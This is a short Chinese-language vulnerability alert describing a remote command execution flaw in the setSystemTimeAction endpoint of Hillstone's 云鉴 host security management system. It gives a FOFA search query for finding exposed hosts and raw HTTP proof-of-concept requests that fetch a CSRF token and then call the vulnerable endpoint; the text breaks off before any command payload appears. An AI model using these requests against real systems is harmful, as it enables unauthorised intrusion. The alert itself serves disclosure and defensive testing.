漏洞预警 山石网科云鉴安全管理系统 setsystemtimeaction rce漏洞

0x01 阅读须知融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！0x02 漏洞描述山石网科云鉴安全管理系统 setsystemtimeaction 存在rce漏洞。0x03 漏洞复现fofa-qeury: body=山石云鉴主机安全管理系统1.执行poc获取token，执行命令并访问得到结果- | GET /master/ajaxActions/getTokenAction.php HTTP/1.1 Host: Cookie: PHPSESSID=2333333333333; Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0- | POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1 Host: User-Agent: Mozilla/5.0 Accept-Encoding: g ………………………………